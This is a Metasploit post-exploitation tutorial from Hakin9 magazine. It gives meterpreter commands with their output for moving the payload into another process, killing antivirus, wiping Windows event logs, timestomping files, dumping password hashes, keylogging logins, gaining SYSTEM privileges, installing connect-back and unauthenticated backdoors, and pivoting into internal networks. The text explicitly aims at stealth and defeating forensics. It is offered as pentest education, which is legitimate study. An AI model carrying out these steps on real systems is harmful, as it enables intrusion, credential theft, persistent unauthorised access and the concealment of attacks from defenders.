Migration to process - Hakin9 EXPLOITING_SOFTWARE TBO (01_2013)

For breaking into the system, vulnerability in some software is exploited and the payload (in this case the meterpreter) is executed in the memory space of the process/software being exploited. As

unex-pected data is sent to the process for exploitation, the process might eventually crash and exit. If the process closes, our meterpreter shell will also be lost as the memory space of the process will be destroyed when it exits.

First step on successful exploitation should be migrating our payload to another process’s mem-ory so that even if the exploited process crashes, the shell is still retained. In order to do this you can run ps to get a list of processes with their PIDs and then use the migrate command to migrate the pay-load to another process (Listing 1).

Killing monitoring software

Now a day almost every system runs some kind of protection or antivirus product. On one hand they are to protect the victim from such attacks, on the other side they cause a hindrance to the attacker. In order to stay stealthy and perform all actions seamlessly, one should consider killing any kind of monitoring or antivirus software on the victim on getting the meterpreter shell. Metasploit makes it easy by providing two important meter-preter scripts namely getcountermeasure and killav.

Getcountermeasure tries to list all the protec-tions present on the machine (Listing 2).

Killav script maintains a name of known antivirus process names. Running the script will look for any of these processes running on the machine and would kill them if present.

Listing 1. Migrate the payload to another process

meterpreter > ps Process list

============

PID Name Path --- ---- ---- ...snip...

228 lsass.exe C:\WINNT\system32\lsass.exe 380 svchost.exe C:\WINNT\system32\svchost.exe 408 spoolsv.exe C:\WINNT\system32\spoolsv.exe 480 regsvc.exe C:\WINNT\system32\regsvc.exe 724 cmd.exe C:\WINNT\System32\cmd.exe 768 Explorer.exe C:\WINNT\Explorer.exe

...snip...

meterpreter > migrate 768 [*] Migrating to 768...

[*] Migration completed successfully.

Listing 2. Listing machine’s protections

meterpreter > run getcountermeasure

[*] Running Getcountermeasure on the target...

[*] Checking for contermeasures...

[*] Getting Windows Built in Firewall configuration...

[*]

[*] Domain profile configuration:

[*] [*] Operational mode = Disable

[*] Exception mode = Enable [*]

[*] Standard profile configuration:

[*] [*] Operational mode = Disable

[*] Exception mode = Enable ...snip...

Figure 1. Windows event viewer logs have been cleared

EXPLOITING WITH METASPLOIT

meterpreter > run killav

[*] Killing Antivirus services on the target...

[*] Killing off avira.exe...

Deleting Logs

Any activity on the system is logged by windows and for the same reason the attack and also all the future activities will be logged by the default log daemon running in windows. No attacker would want to get caught or leave any track that can lead back to him. Therefore clearing the sys-tem logs is a very crucial step of a pentest. Logs should be cleared not only after all the activities on the system has been done but also as soon as the attacker gets into the system. It is impor-tant as there might a cron job running to periodi-cally upload the system logs to some server and might upload the logs containing your attack. Me-terpreter script clearev does the work for us by clearing the system and user logs as shown in Figure 1.

meterpreter > clearev

[*] Wiping 997 records from Application...

[*] Wiping 2045 records from System...

[*] Wiping 1 records from Security...

Another way to detect an attack or malicious ac-tivity on the system is by forensic analysis. Just by deleting the system and user logs one cannot

be sure that it is completely stealthy. The foren-sic analyst usually checks for all the modified files on the target after a certain date and time. This is done by reading the 4 date and time stamp attri-butes of a file which is known as MACE.

MACE signifies Modified, Access, Changed and Entered into the master file table times of a file.

To remain undetected even under forensic analysis we have to take care of the activities done on the machine. Best way is to do every-thing in the memory and not touch the file sys-tem by which I mean not create, modify any file.

There might be cases where it is unavoidable to not interact with the machine. In such cases, timestomp as a part of priv meterpreter exten-sion by Metasploit comes handy which helps you to read and change the MACE times of the file (Listing 3).

For example: Create a file

meterpreter > timestomp test.txt -z “Saturday 10/08/2005 2:02:02 PM”

meterpreter > timestomp test.txt -a “Saturday 10/08/2005 2:02:02 PM”

Victim information gathering

Gathering as much information possible regarding the system gives us a heads up and can help us in future steps. Let’s look at different kind of infor-mation that can be extracted and the way to get it.

Lots of modules and meterpreter scripts are avail-able for gaining information but will be discuss-ing only few important ones here. You can view the available meterpreter scripts by typing run and pressing double tab at the meterpreter prompt.

Figure 2 lists the available run scripts on my instal-lation of Metasploit.

meterpreter > run

• Check the user and the privilege level that we have broken in as.

Listing 3. Change the MACE times of the file meterpreter > use priv

Loading extension priv...success.

meterpreter > timestomp –h

Usage: timestomp file_path OPTIONS OPTIONS:

-a Set the “last accessed” time of the file -b Set the MACE timestamps so that EnCase

shows blanks -r Set the MACE timestamps recursively on a

EXPLOITING WITH METASPLOIT

-d The directory/drive to begin searching from. Leave empty to search all drives.

(Default: )

-f The file pattern glob to search for.

(e.g. *secret*.doc?) -h Help Banner.

-r Recursivly search sub directories.

(Default: true)

• To search for the pdf files run search with ‘-f’

option and pattern to look for

meterpreter > search –f *.pdf Found 418 results...

...snip...

c:\Documents and Settings\All Users\Documents\

datasheet.pdf (28521 bytes) c:\Documents and Settings\victim\Documents\

photo.pdf (71189 bytes) ...snip...

• Working with registry

Windows registry is a place having numerous amount of information where a slight change can lead to big changes. Meterpreter provides us with tool to read, write, create and delete registry on the victim machine (Listing 4).

Using the registry, one can find what files have been utilized, web sites visited in Internet Explor-er, programs utilized, USB devices utilized, and so on.

Listing 4. Read, Write, Create and Delete registry on victim’s machine

meterpreter > reg

Usage: reg [command] [options]

Interact with the target machine’s registry.

OPTIONS:

-d The data to store in the registry value.

-h Help menu.

-k The registry key path (E.g. HKLM\Software\Foo).

-t The registry value type (E.g. REG_SZ).

-v The registry value name (E.g. Stuff).

COMMANDS:

enumkey Enumerate the supplied registry key [-k <key>]

createkey Create the supplied registry key [-k <key>]

deletekey Delete the supplied registry key [-k <key>]

queryclass Queries the class of the supplied key [-k <key>]

setval Set a registry value [-k <key> -v <val> -d <data>]

deleteval Delete the supplied registry value [-k <key> -v <val>]

queryval Queries the data contents of a value [-k <key> -v <val>]

Listing 5. Stealing user’s tokens, password, email, ftp clients

meterpreter > run credcollect [+] Collecting hashes...

Extracted: Administrator:7584248b8d2c9f9eaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904 Extracted: asdfds:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

Extracted: HelpAssistant:713c7f414ef1ddfd43ed3164e67b8d07:70b582319e3a4da8958b93141191d98b Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:b137dc9544f7afa9f6fe85d39bd6b29b [+] Collecting tokens...

HACKBOX\ asdfds

NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM

NT AUTHORITY\ANONYMOUS LOGON meterpreter > run enum_firefox meterpreter > get_pidgin_creds

Listing 6. Get system privileges

meterpreter > use priv

Loading extension priv...success.

meterpreter > getsystem -h Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

-h Help Banner.

-t The technique to use. (Default to ‘0’).

0 : All techniques available

1 : Service - Named Pipe Impersonation (In Memory/Admin) 2 : Service - Named Pipe Impersonation (Dropper/Admin) 3 : Service - Token Duplication (In Memory/Admin) 4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem

...got system (via technique 4).

Listing 7. Error due to a bug

meterpreter > use incognito

Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available

========================================

NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM

HACKBOX\Administrator

Impersonation Tokens Available

========================================

NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token HACKBOX\\Administrator [+] Delegation token available

[+] Successfully impersonated user HACKBOX\Administrator

Listing 8. Machine rebooted

meterpreter > run persistence -h OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent -U Automatically start the agent when the User logs on

-X Automatically start the agent when the system boots -h This help menu

-i The interval in seconds between each connection attempt -p The port on the remote host where Metasploit is listening

-r The IP of the system running Metasploit listening for the connect back

EXPLOITING WITH METASPLOIT

Stealing information

Metasploit provides modules which help the at-tacker/pentester to steal sensitive information from the victim. This includes stealing user tokens, password stored in browsers, email and ftp clients (Listing 5).

Privilege escalation

We have mentioned privilege but let’s try and un-derstand what it is exactly. Suppose you have to perform an action on a machine, it will be asso-ciated with permissions. If you have permissions to perform the action, it will successfully execute else the action is blocked. Privilege defines the permissions to perform actions associated with a user on the system. SYSTEM is the highest privi-lege user on a machine. In certain situation you will find yourself broken in as a low privilege user that will limit actions you can perform on the re-mote system such as dumping passwords, ma-nipulating the registry, installing backdoors, etc.

Fortunately, Metasploit provides few techniques

where in you try to elevate privilege level to attain SYSTEM privileges. Some of them are

• Using getsystem that tries a set of ways to get system privileges as mentioned below (Listing 6)

• Impersonating tokens

Note: While using impersonate_token use 2 backslashes (\\) as with 1 it causes error due to a bug (Listing 7)

• Migrating to high privilege process

Using the technique discussed before to migrate to another process, we can try and migrate to a process that runs under the SYSTEM privileges.

On successful migration to such a process, privi-lege escalation is achieved.

Backdooring or installation of rootkits

Once broken into a machine, you might want to maintain access for further examination or pene-tration into other machines on the network. In sce-narios where one cannot exploit the same soft-Listing 9. Connect back

meterpreter > run persistence -U -i 5 -p 3333 -r 192.168.1.11

[*] Creating a persistent agent: LHOST=192.168.1.11 LPORT=3333 (interval=5 onboot=true) [*] Persistent agent script is 613976 bytes long

[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs [*] Agent executed with PID 492

[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/

HACKBOX_20100821.2602/clean_up__20100821.2602.rc Listing 10. Edit the source or filler out the connections on the port

meterpreter > run metsvc -h [*]

OPTIONS:

-A Automatically start a matching multi/handler to connect to the service -h This help menu

-r Uninstall an existing Meterpreter service (files must be deleted manually)

meterpreter > run metsvc

[*] Creating a meterpreter service on port 31337

[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...

[*] >> Uploading metsrv.dll...

[*] >> Uploading metsvc-server.exe...

[*] >> Uploading metsvc.exe...

[*] Starting the service...

[*] * Installing service metsvc * Starting service

Service metsvc successfully installed.

ware or service again, it ensures that you can still regain control of the machine. If you want to close the current connection in cases when you want to switch off your machine or remove it from the net-work, you are still able to reconnect to the machine without actually exploiting the machine again.

Keylogging

A tool well written in Metasploit allows you to log all the keystrokes from the system without writing anything to the disk, which makes it a lot stealth-ier than any of the other keyloggers. Every sys-tem has a keyboard buffer which includes the key presses that are used by the OS. The same buffer is read and dumped to the attacker by this tool and hence there is no need to write the key presses on the disk before dumping it to the attacker and leaves no trail of it for the forensic analysts. This is quite useful for acquiring username, passwords and other sensitive information.

As all the GUI user interaction happens in the ex-plorer, so in order to keylog we migrate to explorer.

exe process

meterpreter > keyscan_start Starting the keystroke sniffer...

meterpreter > keyscan_dump Dumping captured keystrokes...

gmail.com myusername notmypassword

An icing on the cake is that you can even capture the login information of the user on the machine.

To do that you migrate to the winlogon process and start the keyscan. This will log the credentials of all the users that will login to this machine.

Persistance

To be able to get back to the system that was exploit-ed before even when the vulnerable service is down, use the persistence meterpreter script. This creates a meterpreter service which is available even after the remote machine is rebooted (Listing 8).

Configure the persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address 192.168.1.11 on port 3333 (Listing 9).

As soon as user logs into the sytem and if you have a handler running, you get a meterpreter session. To uninstall the service you can use the command to run the .rc script as shown in the last line of the output. Please note that this backdoor is very noisy, as after the user logs in it will keep trying to connect back to the listener after every 5 seconds. Also this requires no authentication, so

anyone can run a listener with same configuration and will get a meterpreter session of the victim.

MetSvc

Similar to persistence, metsvc written by Alexan-der Sotirov is also a backdoor that allows getting a meterpreter session any time without exploita-tion. Metsvc opens a port runs as a service on that port listening for requests on the victim machine.

The attacker can connect to the port and get a me-terpreter session without an authentication. There-fore it’s not safe to keep this backdoor open There- forev-er as anyone who can connect to this port can get a session. In real world scenarios, you could either edit the source to allow authentication or filter out the connections on the port to only allow attacker to connect (Listing 10).

Victim pivoting

Pivoting is the unique technique of using an in-stance to be able to “move” around inside a net-work. Basically using the first compromised sys-tem to allow and even aid in the compromise of other otherwise inaccessible systems.

In order to understand this better let’s take an example where you have compromised a system that is connected to another network not acces-sible to the attacker. The layout of the network is shown in Figure 4

• Attacker: IP – 192.168.1.132

• Victim1: IP – 192.168.1.131, 2nd IP – 192.168.15.3

• Victim2: IP – 192.168.15.32 (not accessible by attacker)

After breaking into victim1 and using the me-terpreter session to run the ipconfig command

Figure 4. Layout of a test network

EXPLOITING WITH METASPLOIT

shows that the victim1 is connected to two dif-ferent networks. We will use this new information and attack the additional network. Metasploit in-cludes an autoroute meterpreter script that allows the pentester to attack this new network through victim1 (Listing 11).

On successful addition of the route you can scan the new network for other systems. After the scan you can launch an attack on the new sys-tem (victim2) just like the attack on victim1. All the attack data will be routed through victim1 that was added by the autoroute script. On successful exploitation of victim2 we will have a meterpret-er session via the existing metmeterpret-erpretmeterpret-er session of victim1.

This demonstrates that pivoting is an extreme-ly powerful feature available in Metasploit that lets you exploit the systems which are normally not ac-cessible to the attacker. This is one feature which every pentester should know about and have ex-perience using it.

Conclusion

We saw that we can do much more and extract so much information about the victim post exploita-tion than just running a payload with the exploit.

Post exploitation not only helps in gathering more information about the victim but also helps you in

digging further into the network by using the victim as a gateway to other subnets. On an ending note I would say that post exploitation is as important or may be more important than the idea of breaking into the system.

HARSIMRAN WALIA

Harsimran Walia is a research scientist at McAfee Labs. He graduated as with a degree in mechanical engineering from the Indian Institute of Technolo-gy, Delhi. Harsimran presented his re-search at India’s biggest Internation-al Hacking Conference NullCon, 2011 and has provided talk on “Android Se-curity” at c0c0n, 2012, a Cyber securi-ty and policing conference. He specialises in the field of Offensive Metasploit, Reverse Engineering and Malware Analysis. He is also an author of various research papers

In document Hakin9 EXPLOITING_SOFTWARE TBO (01_2013) - Metasploit Tutorials.pdf (Page 74-83)